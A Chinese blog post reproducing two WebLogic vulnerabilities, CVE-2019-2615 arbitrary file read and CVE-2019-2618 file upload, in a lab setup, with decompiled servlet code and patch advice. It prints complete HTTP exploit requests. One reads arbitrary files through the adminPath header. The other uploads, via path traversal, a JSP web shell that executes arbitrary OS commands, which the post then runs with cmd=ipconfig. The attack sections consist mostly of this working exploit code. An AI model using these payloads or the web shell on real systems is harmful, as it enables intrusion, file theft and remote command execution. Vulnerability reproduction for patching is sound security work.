Weblogic任意文件读取and任意文件上传

最新推荐文章于 2023-10-13 11:01:47 发布
最新推荐文章于 2023-10-13 11:01:47 发布
阅读量1.4k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: Weblogic 漏洞复现 POC
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43509897/article/details/97636472
本文详细解析了WebLogic服务器的两个高危漏洞CVE-2019-2615与CVE-2019-2618,包括任意文件读取和文件上传漏洞的成因、复现步骤及修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境搭建:
环境搭建:
首先安装weblogic
下载地址
http://www.oracle.com/technetwork/cn/middleware/weblogic/downloads/wls-main-091116-zhs.html
在这里插入图片描述

安装目录没特别需求可以不更改,一路下一步。
在这里插入图片描述
把复选框去掉
在这里插入图片描述
全选
在这里插入图片描述
(已安装的图片)
在这里插入图片描述
(安装包捆绑有jdk1.6,上一步安装完成)
可以默认
在这里插入图片描述
正在安装
在这里插入图片描述
安装完成
在这里插入图片描述
打开Oracle然后选择Getting started with WebLogic Server
在这里插入图片描述
配置weblogic界面
在这里插入图片描述
域源全选
在这里插入图片描述
一直默认直到设置密码选项
在这里插入图片描述
选择开发模式。
在这里插入图片描述
全选。
在这里插入图片描述
剩下的默认就行
安装完毕。
在安装目录下找到启动程序。
在这里插入图片描述
startWeblogic.cmd
启动成功后,试试能否访问weblogic控制台。
Url:http://192.168.219.131:7001/console/login/LoginForm.jsp
在这里插入图片描述

CVE-2019-2615任意文件读取
漏洞分析
该功能的关键代码在 weblogic.management.servlet.FileDistributionServlet的doGet()方法中:

public void doGet(final HttpServletRequest var1, final HttpServletResponse var2) throws ServletException, IOException {
    AuthenticatedSubject var3 = this.authenticateRequest(var1, var2);
    if(var3 != null) {
        final String var4 = var1.getHeader("wl_request_type");
        if(var3 != KERNEL_ID) {
            AdminResource var5 = new AdminResource("FileDownload", (String)null, var4);
            if(!this.am.isAccessAllowed(var3, var5, (ContextHandler)null)) {
                ManagementLogger.logErrorFDSUnauthorizedDownloadAttempt(var3.getName(), var4);
                var2.sendError(401);
                return;
            }
        }

        try {
            if(debugLogger.isDebugEnabled()) {
                debugLogger.debug("---- >doGet incoming request: " + var4);
            }

            if(var4.equals("wl_xml_entity_request")) {
                this.doGetXMLEntityRequest(var1, var2);
            } else if(var4.equals("wl_jsp_refresh_request")) {
                this.doGetJspRefreshRequest(var1, var2);
            } else if(var4.equals("file")) {
                this.doGetFile(var1, var2);
            } else if(!var4.equals("wl_init_replica_request") && !var4.equals("wl_file_realm_request") && !var4.equals("wl_managed_server_independence_request")) {
                var2.addHeader("ErrorMsg", "Bad request type");
                String var10 = Utils.encodeXSS(var4);
                var2.sendError(400, "Bad request type: " + var10);
                ManagementLogger.logBadRequestInFileDistributionServlet(var4);
            } else {
                ......
                ......
                }
            }
        } catch (Exception var9) {
            if(!Kernel.isInitialized()) {
                throw new AssertionError("kernel not initialized");
            }

            ManagementLogger.logErrorInFileDistributionServlet(var4, var9);
        }

    }
}

先取request中header的参数"wl_request_type"的值,然后判断如果该值等于“wl_xml_entity_request”、“wl_jsp_refresh_request”、“file”…则分别调用各自的方法,进入下一步判断。如果wl_request_type的值为“wl_jsp_refresh_request”,进入doGetJspRefreshRequest()方法:

private void doGetJspRefreshRequest(HttpServletRequest var1, HttpServletResponse var2) throws IOException {
     String var3 = var1.getHeader("adminPath");

     try {
         FileInputStream var4 = new FileInputStream(var3);

         try {
             var2.setContentType("text/plain");
             var2.setStatus(200);
             this.returnInputStream(var4, var2.getOutputStream());
         } finally {
             var4.close();
         }

     } catch (IOException var10) {
         String var5 = "I/O Exception getting resource: " + var10.getMessage();
         var2.addHeader("ErrorMsg", var5);
         var2.sendError(500, var5);
     }
 }

doGetJspRefreshRequest()方法中的“adminPath”也是request中的header参数,在Post包中传入要读取的文件。进入该方法中,直接使用FileInputStream类进行文件读取,故造成了所谓的“任意文件读取”漏洞。

漏洞复现
访问URL:http://192.168.219.131:7001/bea_wls_management_internal2/wl_management
采用BurpSuite抓包
在这里插入图片描述
将POC加入包中
在这里插入图片描述

POC为:

GET /bea_wls_management_internal2/wl_management HTTP/1.1
Host: 192.168.219.131:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6
Connection: close
username:weblogic
password:12345678
wl_request_type:wl_jsp_refresh_request
adminPath:C:\python27\123.txt
Upgrade-Insecure-Requests: 1

发送该包发现
在这里插入图片描述
检查原机的文件发现
在这里插入图片描述

修复建议
升级补丁。Oracle官方更新链接地址:https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html。
或者直接删除了requestType的“wl_jsp_refresh_request”参数的判断,同时也删除了doGetJspRefreshRequest()方法。

CVE-2019-2618文件上传漏洞
漏洞分析
DeploymentServiceServlet类的handlePlanOrApplicationUpload()方法:

private final void handlePlanOrApplicationUpload(HttpServletRequest var1, HttpServletResponse var2, AuthenticatedSubject var3) throws IOException {
    String var4 = mimeDecode(var1.getHeader("wl_upload_application_name"));
    String var5 = ApplicationVersionUtils.getApplicationName(var4);
    String var6 = ApplicationVersionUtils.getVersionId(var4);
    String var7 = mimeDecode(var1.getHeader("wl_request_type"));
    if(var5 == null) {
        Loggable var24 = DeploymentServiceLogger.logRequestWithNoAppNameLoggable(var7);
        logAndSendError(var2, 403, var24);
    } else {
        String var8 = var1.getContentType();
        if(var8 != null && var8.startsWith("multipart")) {

            boolean var25 = false;
            String var10 = var1.getHeader("wl_upload_delta");
            if(var10 != null && var10.equalsIgnoreCase("true")) {
                var25 = true;
            }

            boolean var11 = var7.equals("plan_upload");
            boolean var12 = "false".equals(var1.getHeader("archive"));
            if(this.isDebugEnabled()) {
                this.debug(var7 + " request for application " + var5 + " with archive: " + var12);
            }

            String var13 = null;
            if(var6 == null || var6.length() == 0) {
                var13 = this.getUploadDirName(var5, var6, var25, var11, var12);
            }

            if(var13 == null) {
                var13 = this.getDefaultUploadDirName();
                if(var13 == null) {
                    Loggable var26 = DeploymentServiceLogger.logNoUploadDirectoryLoggable(var7, var5);
                    logAndSendError(var2, 500, var26);
                    return;
                }

                var13 = var13 + var5 + File.separator;
                if(var6 != null) {
                    var13 = var13 + var6 + File.separator;
                }
            }

           if(this.isDebugEnabled()) {
                this.debug(" +++ Final uploadingDirName : " + var13);
            }

            boolean var14 = true;
            String var15 = null;
            ......
            ......

        } else {
            Loggable var9 = DeploymentServiceLogger.logBadContentTypeServletRequestLoggable(var7, var8);
            logAndSendError(var2, 400, var9);
        }
    }
}
该方法主要是对POST包中的传入的headers进行处理,主要作用包括:获取请求包中的“wl_upload_application_name”参数,然后判断是否为空;判断“content-type”;构造上传路径等。

漏洞复现
访问漏洞URL:
http://192.168.219.131:7001/bea_wls_deployment_internal/DeploymentService
并使用BurpSuite抓包
在这里插入图片描述
将发包方式改成POST方式写入POC
在这里插入图片描述
POC为:

POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 192.168.219.131:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
username: weblogic
wl_request_type: app_upload
cache-control: no-cache
wl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/war
serverName: weblogic
password: 12345678
Content-Type: multipart/form-data; boundary=--------1838169138
archive: true
server_version: 10.3.6.0
wl_upload_delta: true
Content-Length: 1044

----------1838169138
Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
Content-Type: false

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p;
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
    }
    else{
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML> 

----------1838169138--

发送数据包发现浏览器出现下图
在这里插入图片描述
访问URL:http://192.168.219.131:7001/bea_wls_internal/shell.jsp?cmd=ipconfig
在这里插入图片描述
漏洞复现完成

修复方案
Oracle官方已经在关键补丁更新(CPU)中修复了该漏洞

参考文档:https://xz.aliyun.com/t/5078

[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 1482
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞。 ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
漏洞挖掘】——75、任意文件读取攻防原理
最新发布
Fly_鹏程万里
06-11 406
在web安全中任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config等,漏洞一般存在于文件下载参数,文件包含参数,主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。
深入浅出JVM系列1:类加载器及其用法
JayLaiSCUT的博客
04-02 6377
1 类产生的原因 在Linux上创建hello.c,使用gcc编译器进行编译gcc hello.c -o hello,得到绿色的可执行程序hello,执行./hello便会在控制台输出Hello World! 学过编译原理的同学都清楚,整个编译过程经历了以下阶段: 这种编译方式的优点很明显,就是可执行文件运行速度快。缺点也很明显,不能跨平台。1)硬件环境原因:如X86和ARM指令集不一样,输出...
Weblogic通过HTTP/T3/IIOP协议部署war包
fnmsd的博客
04-24 9297
水文一篇,主要应对存在弱口令但删除了Console的情况。 重点说三遍: 需要账号密码、需要账号密码、需要账号密码 主要应对console应用被删掉,但仍然使用弱口令的情况。 几处登陆点(HTTP/T3/IIOP)共用账号锁定,只要加起来错误过五次,就会锁定半个小时。 最常见做法:HTTP console应用部署 最常见方法,此处略过。 可以参考:https://www.cnblogs.com/D...
weblogic中间件漏洞复现
kukudeshuo的博客
02-09 1408
weblogic中间件漏洞复现 weblogic介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应
weblogic中间件WLS(bea_wls_internal)组件敏感信息泄露漏洞整改
qq_31358379的博客
10-26 6522
近期负责的系统weblogic中间件bea_wls_internal被查出存在wls组件敏感信息泄露漏洞,访问漏洞地址如下: 针对上述漏洞,做过如下测试,整改未生效。 删除bea_wls_internal.war包,重启服务,服务无法启动,整改失败。 修改为weblogic域下的config.xml文件,在xml文件中<server>下添加标签<default-internal-servlets-disabled>true</default-internal-servle
关于访问DeploymentService为空白页面的解决方案.docx
09-10
关于访问DeploymentService为空白页面的解决方案.docx关于访问DeploymentService为空白页面的解决方案.docx
weblogic任意文件读取漏洞+后台任意上传
s1056481432的博客
08-11 979
前言 看了下vulhub里的weblogic任意文件读取漏洞+后台任意上传war包在这里复现下。 漏洞环境 漏洞环境:一个weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 Weblogic版本:10.3.6(11g) Java版本:1.6 漏洞复现 启动本环境 docker-compose up -d 弱口令 环境启动后,访问http://your-ip:7001/console,即为weblogic后台。 本环境存在弱口令:
101web漏洞挖掘之任意文件读取漏洞1
08-03
任意文件读取漏洞详解】 任意文件读取漏洞是一种常见的Web安全问题,主要发生在PHP、Java和Python等编程语言中。这种漏洞允许攻击者通过构造特定的请求,读取服务器上的任意文件,包括敏感的配置文件、源代码、...
Weblogic-弱口令+任意文件读取+Getshell漏洞复现
qq_44674058的博客
10-13 1021
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
bea_wls_internal.war
01-03
此包是本人在修补weblogic漏洞时,http://sn.cloud.ccb.com/bea_wls_internal/classes/META-INF/MANIFEST.MF漏洞实在没办法,试遍网上所有方法,在被逼无奈之下,花了两周研究出来的,就不要想在其他地方找到了,找到也只是名称相同罢了
2018-05-31-03-18-38-1527736718
05-16
Java综合练习 练习描述 我们现在做一个应用,该应用是一个命令行应用。当程序启动的时候,我们会看到一个命令行的主界面: 1. 添加学生 2. 生成成绩单 3. 退出 请输入你的选择(1~3): 如果我们输入1,那么界面就会变成: 请输入学生信息(格式:姓名, 学号, 学科: 成绩, ...),按回车提交: 如果输入格式不正确,就返回: 请按正确的格式输入(格式:姓名, 学号, 学科: 成绩, ...): 如果输入格式正确就会返回 学生xxx的成绩被添加 然后打印 1. 添加学生 2. 生成成绩单 3. 退出请输入你的选择(1~3): 等于回到了主界面。 如果我们在主界面输入了2,那么界面就会变成: 请输入要打印的学生的学号(格式: 学号, 学号,...),按回车提交: 如果我们输入的不正确,就会打印: 请按正确的格式输入要打印的学生的学号(格式: 学号, 学号,...),按回车提交: 如
WebLogic中WLS 组件漏洞CVE-2017-10271)专项检测工具-附件资源
03-05
WebLogic中WLS 组件漏洞CVE-2017-10271)专项检测工具-附件资源
weblogic 文件打开数_Weblogic任意文件读取任意文件上传
weixin_39586335的博客
12-03 497
引言weblogic中两个CVE漏洞比较有意思,所以复现一下,该两个漏洞需要在poc中加入用户名和密码(cookie)才能实现。环境搭建 环境搭建: 首先安装weblogic 下载地址 http://www.oracle.com/technetwork/cn/middleware/weblogic/downloads/wls-main-091116-zhs.html安装目录没特别需求可以不更改,一...
weblogic漏洞总结复现
1ance's blog
10-07 2754
title: weblogic漏洞总结复现 date: 2021-10-02 22:05:37 updated: tags: weblogic 中间件 漏洞 categories: 漏洞复现 keywords: description: top_img: cover: weblogic.jpg 简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用.
Web漏洞-任意文件读取漏洞
Ays.Ie的博客
03-13 2989
该篇记录了Web漏洞-任意文件读取漏洞
weblogic.Deployer 命令行参考
编程岁月
04-14 2662
weblogic.Deployer 是一个基于 Java 的部署工具,它为管理员和开发人员提供基于命令行的部署操作。 注意: 有关使用 WebLogic 脚本工具(WebLogic Scripting Tool,简称 WLST)执行部署操作的信息,请参阅 WLST 命令和变量参考。 下列部分描述 weblogic.Deployer 实用工具:
weblogic文件下载不弹出窗口
莫等闲的专栏
08-24 4055
有这样一个文件下载连接如下:download在tomcat下,点download的时候,可以弹出文件下载框,但是在weblogic下却直接把该文件打开了。原因是:weblogic是根据HTTP Header 的文件类型来判断是否弹出下载框的,默认的文件类型是contentType="text/html",所以是自动打开的。而tomcat是默认把文件都作为二进制文件,所以弹出对话框。
JavaWeb文件下载实现:本地与服务器端解决方案
- `Content-Type`:表示文件的MIME类型,比如`application/octet-stream`代表二进制流数据,适用于任意类型的文件下载。 - `Content-Disposition`:通常设置为`attachment; filename="filename.ext"`,这会告诉...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值